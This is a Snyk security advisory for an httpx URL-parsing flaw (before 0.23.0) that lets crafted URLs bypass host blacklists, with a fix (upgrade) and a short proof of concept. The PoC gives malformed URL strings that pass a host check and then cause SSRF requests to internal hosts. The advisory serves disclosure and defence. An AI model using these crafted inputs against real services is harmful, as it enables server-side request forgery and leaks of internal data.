Improper Input Validation Affecting httpx package, versions [,0.23.0)
Snyk CVSS
Attack Complexity
Low
User Interaction
Required
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-HTTPX-2772742
- published 13 May 2022
- disclosed 21 Apr 2022
- credit lebr0nli
How to fix?
Upgrade httpx
to version 0.23.0 or higher.
Overview
httpx is a The next generation HTTP client.
Affected versions of this package are vulnerable to Improper Input Validation due to improper implementation of httpx.URL().copy_with
, that causes httpx.Client
and httpx.Proxy
to parse wrong URL. Exploiting this vulnerability leads to blacklist bypass.
PoC:
httpx.Client
user_input_from_http_request = 'http:////admin-dashboard/secret'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'admin-dashboard'
resp = httpx.Client(base_url=u).get('/') # SSRF to http://admin-dashboard/secret
print(resp.text) # sensitive data leak
httpx.Proxy
user_input_from_http_request = 'http://x@//internal-proxy:8082/'
u = httpx.URL(user_input_from_http_request)
assert u.host.lower() != 'internal-proxy'
# httpx.Proxy(u).url.netloc == b'internal-proxy:8082'
resp = httpx.Client(proxies=u).get('/') # will request via http proxy at internal-proxy:8082